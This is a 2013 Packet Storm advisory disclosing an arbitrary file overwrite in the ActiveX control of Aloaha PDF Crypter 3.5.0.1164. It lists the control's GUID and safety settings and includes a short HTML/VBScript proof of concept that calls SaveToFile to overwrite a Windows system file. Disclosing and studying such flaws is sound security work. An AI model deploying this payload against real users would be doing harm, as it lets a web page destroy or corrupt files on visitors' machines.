Aloaha PDF Crypter 3.5.0.1164 File Overwrite

2013-01-24T00:00:00
ID PACKETSTORM:119813
Type packetstorm
Reporter shinnai
Modified 2013-01-24T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
============================================================================================  
TITLE:  
============================================================================================  
Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite  
  
url: http://www.aloaha.com/  
download: http://www.aloaha.com/download/aloaha_crypter.zip  
author: shinnai (http://shinnai.altervista.org)  
============================================================================================  
FILE INFO:  
============================================================================================  
File: C:\WINDOWS\system32\vbCrypt.dll  
InternalName: ebCrypt  
OriginalFilename: ebCrypt.DLL  
FileVersion: 2.0.0.2087  
FileDescription: ebCrypt Main Module  
Product: ebCrypt  
ProductVersion: 2.0.0.2087  
Language: English (United States)  
MD5 hash: b262cb93c555c3c9604502d071a783ec  
============================================================================================  
ACTIVEX INFO:  
============================================================================================  
ProgID: EbCrypt.eb_c_PRNGenerator.1  
GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}  
Description: eb_c_PRNGenerator Class  
Safety report:  
RegKey Safe for Script: False  
RegKey Safe for Init: False  
Implements IObjectSafety: True  
IDisp Safe: Safe for untrusted: caller,data  
============================================================================================  
BUG:  
============================================================================================  
This activex contains the "SaveToFile" which could be used to overwite arbitrary files on  
pc users.  
============================================================================================  
PROOF OF CONCEPT  
============================================================================================  
<html>  
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>  
<script language='vbscript'>  
test.SaveToFile "c:\windows\_system.ini"  
</script>  
</html>  
============================================================================================  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.13 (MingW32)  
  
iQIcBAEBAgAGBQJQ/6sFAAoJEJlK/ai8vywmSUUQAK38iSzcZ3JsD+Kskt1Zwvhc  
hynADNu17uvlcaUoK7uFc8BwOkRT6XqlmJe6Gab02jPClkmaHRH0Oh8/Zxu8T5Y5  
TsLrw7YgUFQDelS4zL7yxZIKofio3GVS55vo3JL1bJvKrANp99BYcQFX4t5539g9  
l/kYf51QGhWXxEvYFlSpDZ8km8dCElLYTT47oFjXMFSpBHyodrU4MPh4FGLoN1XN  
TLrYDOoTke+RXit/nzNKqbNzXIXmBVTBWfYdPLWwcc07Go4KR3tKGl1ELSCczHeg  
PFWCbcJ18l56809afAviUUvrgb1g9WG9ZY5jMxXP1t5oqeeLJKfKhX0KipVtoBUa  
dZZWJOLp6Mmi8VBzfkTu50jZy1B4EtUSTlmj5A2SKBQRM/0SSqZO1LjwE39fQ9gh  
6avUHhPgV9OLqaWxVbNHy6RYBFYHlo46ytvIhgBDU0VPqwI50yyzrObxbRAhCD19  
GjgSBtZqOJQ9sFwiXS+HHQcCt8ZR6pf09yWmxDr+1L7D4yKvq/Z2TsBuYKMUGazW  
Xni6lxddI7LUN88LXlrV8cCoJ7R2gBe9Tg3nUBIDLpXM4hyeU1DTL0kFNATUk3P5  
7xFde64BvKL2GAzEip8j9PuGhezfflIIhsxPHUEemOvsUctqXEQI8DtC0GkRaT3J  
enDko6b3T5jOt6axrWGb  
=H+Gh  
-----END PGP SIGNATURE-----  
  
  
`